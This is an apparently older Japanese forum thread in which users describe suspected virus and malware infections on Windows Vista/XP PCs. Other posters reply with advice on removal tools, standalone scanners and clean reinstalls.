どうやら駆除しきれていないようなので、このままパソコンを使い続けるのは危険なように感じます。
完全に駆除するにはどうしたらよいのでしょうか?
よろしくお願いします。
クリンインスコしる
繰り返し質問ですみません。
クリーンインストールって、Vistaを再インストールするってことですか?
それとBackdoor.Win32.VB.epoはどんな悪影響を及ぼすウイルスなのでしょうか?
ググってみてもまともな解説のあるサイトをほとんど発見できなかったのですが…。
カスペのオンラインで駆除出来ると思うが万全を期すんだったら再インストール
だーかーらー
ウジウジ悩むくらいなら綺麗さっぱり消しちまえ
ついでにうぃるすきらぁも投げ捨てて別なワクチンを導入しろ
間違ってもキングとかセキュリティZEROみたいなジョークソフトを入れるなよ
キラーのスレでも同じようなこと言ってる人いたからキラーの問題じゃないか?
ありがとうございます。
まずはカスペにアクセスして駆除を試してみます。
駄目なら大事なデータを避難して再インストールします。
多分それは私だと思います。レスがつかなかったのでスレチかと思って…。
結果的にはマルチになってしまいましたね、すみません…。
フォルダの中には「新しいフォルダ(8)」が入っていて、その中には何もありませんでした
プロパティで確認したところ0メガバイトでした。
自分家族はもちろんのこと知人にもCHIKAKOという名の人はいないのですが
勝手にこんなフォルダを作成するウイルスってあるのでしょうか?
誰かがその名前でPC使ったんじゃね?
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybotとブラスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「場所:C:\ProgramData\Skype\Plugins\_sstore.dat
ウィルス名:SVL 1.X (Slovakia)
スカイプはいつもオンにしていて特に変わった作業をしたわけではありませんが、
いきなりavast!の警告が出ました。
avast!のスキャンを実行していたわけでもありません。
このウィルス警告が出たので、avastの警告画面の削除ボタンを押しました。
このウィルスは何ですか?なに経由できたんでしょうか?」
ダウンロード終わったとほぼ同時に、いきなり強制終了したかのように確認ウィンドウもなしに電源が切れ、
すぐに電源ボタン押しても全く反応せず、
数分後に再び電源ボタン押すと数秒だけ起動しただけで、またシャットダウンしました
今も起動出来ません
この症状を質問スレで書いて聞いてみたら
「おそらく出力が安定していない。電源ユニットが逝ったと思われる。交換しよう」と、回答が返ってきたのですが
ウィルスでこのような症状に陥ることはないのでしょうか?
1.電源入れてからどの辺りまで正常に起動できるか
2.セーフモードでの起動も試してみたか
レスありがとうございます
PCの起動ボタンを押すと反応するときとしないときがあります。
反応したときはDELLのロゴが出てくるところまで行くこともありますが、行かないこともあります。
ロゴまで行ってもそれ以上進むことはなく、ロゴが表示してる間にF8ボタンを押すと一度だけ進み、
通常起動する(うろ覚え)を選び、何もなかったかのように起動してデスクトップまで行きましたが
ウィルスバスター2009でフルスキャンをかけている途中で突然強制終了しました。
まだセーフモードで起動は試みてませんが、次いけそうであればやってみます。
それと次起動できたときはスキャンよりシステムの復元を試したほうがよいでしょうか?
PCに繋がっている周辺機器(マウス・キーボード以外)を外しても同じことになりますか?
システムの復元はイチかバチかの賭け
上手く行けば良いけど…
もう夜も遅いので、また明日やってみることにします
どうやらBlasterというウィルスみたいですね
もしBlasterなら再起動という症状ですし。
わかる方いませんか?
がMulti-postだとわかりました!
マルチポストじゃないですが・・
心配なのでこちらでも聞かせてもらいます。
特徴が、
・1時間ぐらいごとにインターネットが強制終了される。
・今まで使っていたトレンド社のウイルススキャンが使えない
・さらに、他何社かのウイルススキャンも試してみたが、
『ネットワークに接続してください』などと出て、
ウイルスキャン自体が使えない。
他にもあると思うんですがいま分かっているのは
これだけです。
インターネットは利用でき、他は問題なく使えますが
こんなことは初めてなのでどうしたらいいかも、
知識もまったくありません。
ファイルスキャンという物も試そうと思ってみましたが、
どこに潜んでいるのかも分からず完全に手詰まりです。
どなたか解決方法、解決までの手順などを教えてください。
【使用OS】 「windows xp」
【Microsoft Update(MU)の状態】 「最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】
【使用セキュリティソフトとバージョン】 「体験版をインストールしていたが、使用期限が切れている」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「不明(スキャン不可)」
スレ違いでしたらご指摘下さい。
よろしくお願いします。
ttp://drweb.jp/support/cureit.html ttp://avptool.virusinfo.info/en/index.htm ttp://www.norman.com/support/support_tools/58732/en スタンドアロン型のアンチウイルス。
他のPCでダウンロードして、CDかUSBメモリで移して使ってみたら?
論外。
ウイルスじゃなくてマルウエアが入ってて、セキュリティベンダーへのアクセスを阻害されてるんだと思う。たぶんHOST情報も書き換えられてる予感。
まずクリーンインストールし、Windows Updateを実施。
それからフリーでもいいからアンチウイルスソフトとアンチスパイウエア(マルウエア)ソフトを必ずインストールし、毎日Updateする癖をつけたほうが良い。スキャンも。
ウイルスやマルウエアを撒き散らすPCでメール送受信するのは大迷惑だ。
もしサイト持ちなら、そんなセキュリティ認識が無い管理人のサイトは勘弁して欲しいし、二度とサイトに行かない。
aviraもしくはavastでウイルス対策。
SUPERAntispyware、windows defenderでマルウエア対策。
PC初心者なら通産省で配布しているCCCクリーナーも数日に一度Updateされているので、そちらでのスキャンを試してみるもの良いと思う。
それにもアクセスできないかな?
